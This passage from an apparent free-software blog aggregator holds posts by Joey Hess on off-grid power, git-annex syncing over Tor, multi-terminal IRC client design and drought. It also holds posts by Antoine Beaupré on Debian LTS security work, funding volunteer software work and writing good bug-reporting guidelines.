files. But as I just described, this is very hard. However, Ian Jackson has the beginnings of a workflow that just might fit the bill.

6 January 2017

Joey Hess: the cliff

Falling off the cliff is always a surprise. I know it's there; I've been living next to it for months. I chart its outline daily. Avoiding it has become routine, and so comfortable, and so failing to avoid it surprises. Monday evening around 10 pm, the laptop starts draining down from 100%. House battery, which has been steady around 11.5-10.8 volts since well before Winter solstice, and was in the low 10's, has plummeted to 8.5 volts. With the old batteries, the cliff used to be at 7 volts, but now, with new batteries but fewer, it's in a surprising place, something like 10 volts, and I fell off it. Weather forecast for the week ahead is much like the previous week: Maybe a couple sunny afternoons, but mostly no sun at all. Falling off the cliff is not all bad. It shakes things up. It's a good opportunity to disconnect, to read paper books, and think long winter thoughts. It forces some flexability. I have an auxillary battery for these situations. With its own little portable solar panel, it can charge the laptop and run it for around 6 hours. But it takes it several days of winter sun to charge back up. That's enough to get me through the night. Then I take a short trip, and glory in one sunny afternoon. But I know that won't get me out of the hole, the batteries need a sunny week to recover. This evening, I expect to lose power again, and probably tomorrow evening too. Luckily, my goal for the week was to write slides for two talks, and I've been able to do that despite being mostly offline, and sometimes decomputered. And, in a few days I will be jetting off to Australia! That should give the batteries a perfect chance to recover. Previously: battery bank refresh late summer

1 January 2017

Joey Hess: p2p dreams

In one of the good parts of the very mixed bag that is "Lo and Behold: Reveries of the Connected World", Werner Herzog asks his interviewees what the Internet might dream of, if it could dream. The best answer he gets is along the lines of: The Internet of before dreamed a dream of the World Wide Web. It dreamed some nodes were servers, and some were clients. And that dream became current reality, because that's the essence of the Internet. Three years ago, it seemed like perhaps another dream was developing post-Snowden, of dissolving the distinction between clients and servers, connecting peer-to-peer using addresses that are also cryptographic public keys, so authentication and encryption and authorization are built in. Telehash is one hopeful attempt at this, others include snow, cjdns, i2p, etc. So far, none of them seem to have developed into a widely used network, although any of them still might get there. There are a lot of technical challenges due to the current Internet dream/nightmare, where the peers on the edges have multiple barriers to connecting to other peers. But, one project has developed something similar to the new dream, almost as a side effect of its main goals: Tor's onion services. I'd wanted to use such a thing in git-annex, for peer-to-peer sharing and syncing of git-annex repositories. On November 13th, I started building it, using Tor, and I'm releasing it concurrently with this blog post.
git-annex's Tor support replaces its old hack of tunneling git protocol over XMPP. That hack was unreliable (it needed a TCP on top of XMPP layer) but worse, the XMPP server could see all the data being transferred. And, there are fewer large XMPP servers these days, so fewer users could use it at all. If you were using XMPP with git-annex, you'll need to switch to either Tor or a server accessed via ssh.
Now git-annex can serve a repository as a Tor onion service, and that can then be accessed as a git remote, using an url like tor-annex::tungqmfb62z3qirc.onion:42913. All the regular git, and git-annex commands, can be used with such a remote. Tor has a lot of goals for protecting anonymity and privacy. But the important things for this project are just that it has end-to-end encryption, with addresses that are public keys, and allows P2P connections. Building an anonymous file exchange on top of Tor is not my goal -- if you want that, you probably don't want to be exchanging git histories that record every edit to the file and expose your real name by default. Building this was not without its difficulties. Tor onion services were originally intended to run hidden websites, not to connect peers to peers, and this kind of shows.. Tor does not cater to end users setting up lots of Onion services. Either root has to edit the torrc file, or the Tor control port can be used to ask it to set one up. But, the control port is not enabled by default, so you still need to su to root to enable it. Also, it's difficult to find a place to put the hidden service's unix socket file that's writable by a non-root user. So I had to code around this, with a git annex enable-tor that su's to root and sets it all up for you.
One interesting detail about the implementation of the P2P protocol in git-annex is that it uses two Free monads to build up actions. There's a Net monad which can be used to send and receive protocol messages, and a Local monad which allows only the necessary modifications to files on disk. Interpreters for Free monad actions can chose exactly which actions to allow for security reasons. For example, before a peer has authenticated, the P2P protocol is being run by an interpreter that refuses to run any Local actions whatsoever. Other interpreters for the Net monad could be used to support other network transports than Tor.
When two peers are connected over Tor, one knows it's talking to the owner of a particular onion address, but the other peer knows nothing about who's talking to it, by design. This makes authentication harder than it would be in a P2P system with a design like Telehash. So git-annex does its own authentication on top of Tor. With authentication, users would need to exchange absurdly long addresses (over 150 characters) to connect their repositories. One very convenient thing about using XMPP was that a user would have connections to their friend's accounts, so it was easy to share with them. Exchanging long addresses is too hard. This is where Magic Wormhole saved the day. It's a very elegant way to get any two peers in touch with each other, and the users only have to exchange a short code phrase, like "2-mango-delight", which can only be used once. Magic Wormhole makes some security tradeoffs for this simplicity. It's got vulnerabilities to DOS attacks, and its MITM resistance could be improved. But I'm lucky it came along just in time. So, it takes only installing Tor and Magic Wormhole, running two git-annex commands, and exchanging short code phrases with a friend, perhaps over the phone or in an encrypted email, to get your git-annex repositories connected and syncing over Tor. See the documentation for details. Also, the git-annex webapp allows setting the same thing up point-and-click style. The Tor project blog has throughout December been featuring all kinds of projects that are using Tor. Consider this a late bonus addition to that. ;) I hope that Tor onion services will continue to develop to make them easier to use for peer-to-peer systems. We can still dream a better Internet.
This work was made possible by all my supporters on Patreon.

27 December 2016

Joey Hess: multi-terminal applications

While learning about and configuring weechat this evening, I noticed a lot of complexity and unsatisfying tradeoffs related to its UI, its mouse support, and its built-in window system. Got to wondering what I'd do differently, if I wrote my own IRC client, to avoid those problems. The first thing I realized is, it is not a good idea to think about writing your own IRC client. Danger will robinson.. So, let's generalize. This blog post is not about designing an IRC client, but about exploring simpler ways that something like an IRC client might handle its UI, and perhaps designing something general-purpose that could be used by someone else to build an IRC client, or be mashed up with an existing IRC client. What any modern IRC client needs to do is display various channels to the user. Maybe more than one channel should be visible at a time in some kind of window, but often the user will have lots of available channel and only want to see a few of them at a time. So there needs to be an interface for picking which channel(s) to display, and if multiple windows are shown, for arranging the windows. Often that interface also indicates when there is activity on a channel. The most recent messages from the channel are displayed. There should be a way to scroll back to see messages that have already scrolled by. There needs to be an interface for sending a message to a channel. Finally, a list of users in the channel is often desired. Modern IRC clients implement their own UI for channel display, windowing, channel selection, activity notification, scrollback, message entry, and user list. Even the IRC clients that run in a terminal include all of that. But how much of that do they need to implement, really? Suppose the user has a tabbed window manager, that can display virtual terminals. The terminals can set their title, and can indicate when there is activity in the terminal. Then an IRC client could just open a bunch of terminals, one per channel. Let the window manager handle channel selection, windowing (naturally), and activity notification. For scrollback, the IRC client can use the terminal's own scrollback buffer, so the terminal's regular scrollback interface can be used. This is slightly tricky; can't use the terminal's alternate display, and have to handle the UI for the message entry line at the bottom. That's all the UI an IRC client needs (except for the user list), and most of that is already implemented in the window manager and virtual terminal. So that's an elegant way to make an IRC client without building much new UI at all. But, unfortunately, most of us don't use tabbed window managers (or tabbed terminals). Such an IRC client, in a non-tabbed window manager, would be a many-windowed mess. Even in a tabbed window manager, it might be annoying to have so many windows for one program. So we need fewer windows. Let's have one channel list window, and one channel display window. There could also be a user list window. And there could be a way to open additional, dedicated display windows for channels, but that's optional. All of these windows can be seperate virtual terminals. A potential problem: When changing the displayed channel, it needs to output a significant number of messages for that channel, so that the scrollback buffer gets populated. With a large number of lines, that can be too slow to feel snappy. In some tests, scrolling 10 thousand lines was noticiably slow, but scrolling 1 thousand lines happens fast enough not to be noticiable. (Terminals should really be faster at scrolling than this, but they're still writing scrollback to unlinked temp files.. sigh!) An IRC client that uses multiple cooperating virtual terminals, needs a way to start up a new virtual terminal displaying the current channel. It could run something like this:
x-terminal-emulator -e the-irc-client --display-current-channel
That would communicate with the main process via a unix socket to find out what to display. Or, more generally:
x-terminal-emulator -e connect-pty /dev/pts/9
connect-pty would simply connect a pty device to the terminal, relaying IO between them. The calling program would allocate the pty and do IO to it. This may be too general to be optimal though. For one thing, I think that most curses libraries have a singleton terminal baked into them, so it might be hard to have a single process control cursors on multiple pty's. And, it might be innefficient to feed that 1 thousand lines of scrollback through the pty and copy it to the terminal. Less general than that, but still general enough to not involve writing an IRC client, would be a library that handled the irc-client-like channel display, with messages scrolling up the terminal (and into the scrollback buffer), a input area at the bottom, and perhaps a few other fixed regions for status bars and etc. Oh, I already implemented that! In concurrent-output, over a year ago: a tiling region manager for the console I wonder what other terminal applications could be simplified/improved by using multiple terminals? One that comes to mind is mutt, which has a folder list, a folder view, and an email view, that all are shoehorned, with some complexity, into a single terminal.

30 November 2016

Joey Hess: drought

Drought here since August. The small cistern ran dry a month ago, which has never happened before. The large cistern was down to some 900 gallons. I don't use anywhere near the national average of 400 gallons per day. More like 10 gallons. So could have managed for a few more months. Still, this was worrying, especially as the area moved from severe to extreme drought according to the US Drought Monitor. Two days of solid rain fixed it, yay! The small cistern has already refilled, and the large will probably be full by tomorrow. The winds preceeding that same rain storm fanned the flames that destroyed Gatlinburg. Earlier, fire got within 10 miles of here, although that may have been some kind of controlled burn. Climate change is leading to longer duration weather events in this area. What tended to be a couple of dry weeks in the fall, has become multiple months of drought and weeks of fire. What might have been a few days of winter weather and a few inches of snow before the front moved through has turned into multiple weeks of arctic air, with multiple 1 ft snowfalls. What might have been a few scorching summer days has become a week of 100-110 degree temperatures. I've seen all that over the past several years. After this, I'm adding "additional, larger cistern" to my todo list. Also "larger fire break around house".

16 November 2016

Joey Hess: Linux.Conf.Au 2017 presentation on Propellor

On January 18th, I'll be presenting "Type driven configuration management with Propellor" at Linux.Conf.Au in Hobart, Tasmania. Abstract Linux.Conf.Au is a wonderful conference, and I'm thrilled to be able to attend it again. -- Update: My presentation on keysafe has also been accepted for the Security MiniConf at LCA, January 17th.

31 October 2016

Antoine Beaupr : My free software activities, October 2016

Debian Long Term Support (LTS) This is my 7th month working on Debian LTS, started by Raphael Hertzog at Freexian, after a long pause during the summer. I have worked on the following packages and CVEs: I have also helped review work on the following packages:
  • imagemagick: reviewed BenH's work to figure out what was done. unfortunately, I forgot to officially take on the package and Roberto started working on it in the meantime. I nevertheless took time to review Roberto's work and outline possible issues with the original patchset suggested
  • tiff: reviewed Raphael's work on the hairy TIFFTAG_* issues, all the gory details in this email
The work on ImageMagick and GraphicsMagick was particularly intriguing. Looking at the source of those programs makes me wonder why were are still using them at all: it's a tangled mess of C code that is bound to bring up more and more vulnerabilities, time after time. It seems there's always an "Magick" vulnerability waiting to be fixed out there... I somehow hoped that the fork would bring more stability and reliability, but it seems they are suffering from similar issues because, fundamentally, they haven't rewritten ImageMagick... It looks this is something that affects all image programs. The review I have done on the tiff suite give me the same shivering sensation as reviewing the "Magick" code. It feels like all image libraries are poorly implemented and then bound to be exploited somehow... Nevertheless, if I had to use a library of the sort in my software, I would stay away from the "Magick" forks and try something like imlib2 first... Finally, I also did some minor work on the user and developer LTS documentation and some triage work on samba, xen and libass. I also looked at the dreaded CVE-2016-7117 vulnerability in the Linux kernel to verify its impact on wheezy users. I also looked at implementing a --lts flag for dch (see bug #762715). It was difficult to get back to work after such a long pause, but I am happy I was able to contribute a significant number of hours. It's a bit difficult to find work sometimes in LTS-land, even if there's actually always a lot of work to be done. For example, I used to be one of the people doing frontdesk work, but those duties are now assigned until the end of the year, so it's unlikely I will be doing any of that for the forseable future. Similarly, a lot of packages were assigned when I started looking at the available packages. There was an interesting discussion on the internal mailing list regarding unlocking package ownership, because some people had packages locked for weeks, sometimes months, without significant activity. Hopefully that situation will improve after that discussion. Another interesting discussion I participated in is the question of whether the LTS team should be waiting for unstable to be fixed before publishing fixes in oldstable. It seems the consensus right now is that it shouldn't be mandatory to fix issues in unstable before we fix security isssues in oldstable and stable. After all, security support for testing and unstable is limited. But I was happy to learn that working on brand new patches is part of our mandate as part of the LTS work. I did work on such a patch for tar which ended up being adopted by the original reporter, although upstream ended up implementing our recommendation in a better way. It's coincidentally the first time since I start working on LTS that I didn't get the number of requested hours, which means that there are more people working on LTS. That is a good thing, but I am worried it may also mean people are more spread out and less capable of focusing for longer periods of time on more difficult problems. It also means that the team is growing faster than the funding, which is unfortunate: now is a good time as any to remind you to see if you can make your company fund the LTS project if you are still running Debian wheezy.

Other free software work It seems like forever that I did such a report, and while I was on vacation, a lot has happened since the last report.

Monkeysign I have done extensive work on Monkeysign, trying to bring it kicking and screaming in the new world of GnuPG 2.1. This was the objective of the 2.1 release, which collected about two years of work and patches, including arbitrary MUA support (e.g. Thunderbird), config files support, and a release on PyPI. I have had to release about 4 more releases to try and fix the build chain, ship the test suite with the program and have a primitive preferences panel. The 2.2 release also finally features Tor suport! I am also happy to have moved more documentation to Read the docs, part of which I mentionned in in a previous article. The git repositories and issues were also moved to a Gitlab instance which will hopefully improve the collaboration workflow, although we still have issues in streamlining the merge request workflow. All in all, I am happy to be working on Monkeysign, but it has been a frustrating experience. In the last years, I have been maintaining the project largely on my own: although there are about 20 contributors in Monkeysign, I have committed over 90% of the commits in the code. New contributors recently showed up, and I hope this will release some pressure on me being the sole maintainer, but I am not sure how viable the project is.

Funding free software work More and more, I wonder how to sustain my contributions to free software. As a previous article has shown, I work a lot on the computer, even when I am not on a full-time job. Monkeysign has been a significant time drain in the last months, and I have done this work on a completely volunteer basis. I wouldn't mind so much except that there is a lot of work I do on a volunteer basis. This means that I sometimes must prioritize paid consulting work, at the expense of those volunteer projects. While most of my paid work usually revolves around free sofware, the benefits of paid work are not always immediately obvious, as the primary objective is to deliver to the customer, and the community as a whole is somewhat of a side-effect. I have watched with interest joeyh's adventures into crowdfunding which seems to be working pretty well for him. Unfortunately, I cannot claim the incredible (and well-deserved) reputation Joey has, and even if I could, I can't live with 500$ a month. I would love to hear if people would be interested in funding my work in such a way. I am hesitant in launching a crowdfunding campaign because it is difficult to identify what exactly I am working on from one month to the next. Looking back at earlier reports shows that I am all over the place: one month I'll work on a Perl Wiki (Ikiwiki), the next one I'll be hacking at a multimedia home cinema (Kodi). I can hardly think of how to fund those things short of "just give me money to work on anything I feel like", which I can hardly ask for of anyone. Even worse, it feels like the audience here is either friends or colleagues. It would make little sense for me to seek funding from those people: colleagues have the same funding problems I do, and I don't want to empoverish my friends... So far I have taken the approach of trying to get funding for work I am doing, bit by bit. For example, I have recently been told that LWN actually pays for contributed articles and have started running articles by them before publishing them here. This is looking good: they will publish an article I wrote about the Omnia router I have recently received. I give them exclusive rights on the article for two weeks, but I otherwise retain full ownership over the article and will publish them after the exclusive period here. Hopefully, I will be able to find more such projects that pays for the work I do on a day to day basis.

Open Street Map editing I have ramped up my OpenStreetMap contributions, having (temporarily) moved to a different location. There are lots of things to map here: trails, gaz stations and lots of other things are missing from the map. Sometimes the effort looks a bit ridiculous, reminding me of my early days of editing OSM. I have registered to OSM Live, a project to fund OSM editors that, I must admit, doesn't help much with funding my work: with the hundreds of edits I did in October, I received the equivalent of 1.80$CAD in Bitcoins. This may be the lowest hourly salary I have ever received, probably going at a rate of 10 per hour! Still, it's interesting to be able to point people to the project if someone wants to contribute to OSM mappers. But mappers should have no illusions about getting a decent salary from this effort, I am sorry to say.

Bounties I feel this is similar to the "bounty" model used by the Borg project: I claimed around $80USD in that project for what probably amounts to tens of hours of work, yet another salary that would qualify as "poor". Another example is a feature I would like to implement in Borg: support for protocols other than SSH. There is currently no bounty on this, but a similar feature, S3 support has one of the largest bounties Borg has ever seen: $225USD. And the claimant for the bounty hasn't actually implemented the feature, instead backing up to S3, the patch (to a third-party tool) actually enables support for Amazon Cloud Drive, a completely different API. Even at $225, I wouldn't be able to complete any of those features and get a decent salary. As well explained by the Snowdrift reviews, bounties just don't work at all... The ludicrous 10% fee charged by Bountysource made sure I would never do business with them ever again anyways.

Other work There are probably more things I did recently, but I am having difficulty keeping track of the last 5 months of on and off work, so you will forgive that I am not as exhaustive as I usually am.

14 October 2016

Antoine Beaupr : Managing good bug reports

Bug reporting is an art form that is too often neglected in software projects. Bug reports allow contributors to participate without deep technical knowledge and at the same time provide a crucial space for developers to be made aware of issues with their software that they could not have foreseen or found themselves, for lack of resources, variety or imagination.

Prior art Unfortunately, there are rarely good guidelines for submitting bug reports. Historically, people have pointed towards How to report bugs effectively or How to ask questions the smart way. While those guides can be useful for motivated people and may seem attractive references for project managers, they suffer from serious issues:
  • they are written by technical people, for non-technical people
  • as a result, they have a deeply condescending attitude such as calling people "stupid" or various animal names like "mongoose"
  • they are also very technical themselves: one starts with a copyright notice and a changelog, the other uses magic words like "Core dumps" and $Id$
  • they are too long: sgtatham's is about 3600 words long, esr's is even longer at about 11800 words. those texts will take about 20 to 60 minutes to read by an average reader, according to research
Individual projects have their own guides as well. Linux has the REPORTING_BUGS file that is a much shorter 1200 that can be read under 5 minutes, provided that you can understand the topic at hand. Interestingly, that guide refers to both esr's and sgtatham's guidelines, which means, in the degenerate case where the user hasn't had the "privilege" of reading esr's prose already, they will have an extra hour and a half of reading to do to have honestly followed the guidelines before reporting the bug. I often find good documentation in the Tails project. Their bug reporting guidelines are easily accessible and quick to read, although they still might be too technical. It could be argued that you need to get technical at some point to get that information out, of course. In the Monkeysign project, I have started a bug reporting guide that doesn't yet address all those issues. I am considering writing a new guide, but I figured I would look at other people's work and get feedback before writing my own standard.

What's the point? Why have those documents been written? Are people really expected to read them before seeking help? It seems to me unlikely that someone would:
  1. be motivated enough to do something about a broken part of their computer
  2. figure out they can do something about it
  3. read a fifteen thousand words novel about how to report a bug...
  4. just to finally write a 20-line bug report that has no warranty of support attached to it
And if I would be a paying customer, I wouldn't want to be forced to waste my time reading that prose either: it's your job to help me fix your broken things, not the reverse. As someone doing consulting these days: I totally understand: it's not you, the user, it's us, the developers, that have a problem. We have been socialized through computers, and it makes us weird and obtuse, but that's no excuse, and we need to clean up our act. Furthermore, it's surprising how often we get (and make!) bug reports that can be difficult to use. The Monkeysign project is very "technical" and I have expected that the bug reports I would get would be well written, with ways to reproduce and so on, but it happened that I received bug reports that were all over the place, didn't have any ways of reproducing or were simply incomplete. Those three bug reports were filed by people that I know to be very technically capable: one is a fellow Debian developer, the second had filed a good bug report 5 days before, and the third one is a contributor that sent good patches before. In all three cases, they knew what they were doing. Those three people probably read the guidelines mentioned in the past. They may have even read the Monkeysign bug reporting guidelines as well. I can only explain those bug reports by the lack of time: people thought the issue was obvious, that it would get fixed rapidly because, obviously, something is broken. We need a better way.

The takeaway What are those guides trying to tell us?
  1. ask questions in the right place
  2. search for similar questions and issues before reporting the bug
  3. try to make the developers reproduce the issues
  4. failing that, try to describe the issue as well as you can
  5. write clearly, be specific and verbose yet concise
There are obviously contradictions in there, like sgtatham telling us to be verbose and esr tells us to, basically, not be verbose. There is definitely a tension in there, and there are many, many more details about how great bug reports can be if done properly. I tend towards the side of terseness in our descriptions: people that will know how to be concise will be, people that don't will most likely not learn by reading a 12 000 words novel that, in itself, didn't manage to be parsimonious. But I am willing to allow for verbosity in bug reports: I prefer too many details instead of missing a key bit of information.

Issue trackers Step 1 is our job: we should send people in the right place, and give them the right tools. Monkeysign used to manage bugs with bugs-everywhere and this turned out to be a terrible idea: you had to understand git and bugs-everywhere to file any bug reports. As a result, there were exactly zero bug reports filed by non-developers during the whole time BE was used, although some bugs were filed in the Debian Bugtracker. So have a good bug tracker. A mailing list or email address is not a good bug tracker: you lose track of old issues, and it's hard for newcomers to search the archives. It does have the advantage of having a unified interface for the support forum and bug tracking, however. Redmine, Gitlab, Github and others are all decent-enough bug trackers. The key point is that the issue tracker should be publicly available, and users should be able to register easily to file new issues. You should also be able to mass-edit tickets and users should be able to discover the tracker's features easily. I am sorry to say that the Debian BTS somewhat falls short on those two features. Step 2 is a shared responsibility: there should be an easy way to search for issues, and we should help the user looking for similar issues. Stackexchange sites do an excellent job at this, by automatically searching for similar questions while you write your question, suggesting similar ones in an attempt to weed out duplicates. Duplicates still happen, but they can then clearly be marked and linked with a distinct mechanism. Most bug trackers do not offer such high level functionality, but should, so I feel the fault lies more on "our" end than at the user's end.

Reproducing the environment Step 3 and 4 are more or less the user's responsibility. We can detail in our documentation how to clearly share the environment where we reproduced the bug, for example, but in the end, the user decides if they want to share that information or not. In Monkeysign, I have finally implemented joeyh's suggestion of shipping the test suite with the program. I can now tell people to run the test suite in their environment to see if this is a regression that is specific to their environment - so a known bug, in a way - or a novel bug for which I can look at writing a new unit test. I also include way more information about the environment in the --version output, an idea I brought forward in the borg project to ease debugging. That way, people can just send the output of monkeysign --test and monkeysign --version, and I have a very good overview of what is happening on their end. Of course, Monkeysign also supports the usual --verbose and --debug flag that users should enable when reproducing issues. Another idea is to report bugs directly from the application. We have all seen Firefox or other software have automatic bug reporting tools, but somehow those seem unsatisfactory for a user: we have no feedback of where the report goes, if it's followed up on. It is useful for larger project to get statistical data, but not so useful for users in the short term. Monkeysign tries to handle exceptions in the code in a graceful way, but could do better. We use a small library to handle exceptions, but that library has since then been improved to directly file bugs against the Github project. This assumes the user is logged into Github, but it is nice to pre-populate bug reports with the relevant information up front.

Issue templates In the meantime, to make sure people provide enough information, I have now moved a lot of the bug reporting guidelines to a separate issue template. That issue template is available through the issue creation form now, although it is not enabled by default, a weird limitation of Gitlab. Issue templates are available in Gitlab and Github. Issue templates somewhat force users in a straight jacket: there is already something to structure their bug report. Those could be distinct form elements that had to be filled in, but I like the flexibility of the template, and the possibility for users to just escape the formalism and just plead for help in their own way.

Issue guidelines In the end, I opted for a short few paragraphs in the style of the Tails documentation, including a reference to sgtatham, as an optional future reference:
  • Before you report a new bug, review the existing issues in the online issue tracker and the Debian BTS for Monkeysign to make sure the bug has not already been reported elsewhere.
  • The first aim of a bug report is to tell the developers exactly how to reproduce the failure, so try to reproduce the issue yourself and describe how you did that.
  • If that is not possible, try to describe what went wrong in detail. Write down the error messages, especially if they have numbers.
  • Take the necessary time to write clearly and precisely. Say what you mean, and make sure it cannot be misinterpreted.
  • Include the output of monkeysign --test, monkeysign --version and monkeysign --debug in your bug reports. See the issue template for more details about what to include in bug reports.
If you wish to read more about issues regarding communication in bug reports, you can read How to Report Bugs Effectively, which takes around 20 to 30 minutes.
Unfortunately, short of rewriting sgtatham's guide, I do not feel there is much more we can do as a general guide. I find esr's guide to be too verbose and commanding, so sgtatham it will be for now.

The prose and literacy In the end, there is a fundamental issue with reporting bugs: it assumes our users are literate and capable of writing amazing prose that we will enjoy reading as the last J.K. Rowling novel (if you're into that kind of thing). It's just an unreasonable expectation: some of your users don't even speak the same language as you, let alone read or write it. This makes for challenging collaboration, to say the least. This is where automated reporting makes sense: it doesn't require user's intervention, and the communication is mediated by machines without human intervention and their pesky culture. But we should, as maintainers, "be liberal in what we accept and conservative in what we send". Be tolerant, and help your users in fixing their issues. It's what you are there for, after all. And in the end, we all fail the same way. In an attempt to improve the situation on bug reporting guides, I seem to have myself written a 2000 short story that will have taken up a hopefully pleasant 10 minutes of your time at minimum. Hopefully I will have succeeded at being clear, specific, verbose and concise all at once and look forward to your feedback on how to improve our bug reporting culture.

Next.

Previous.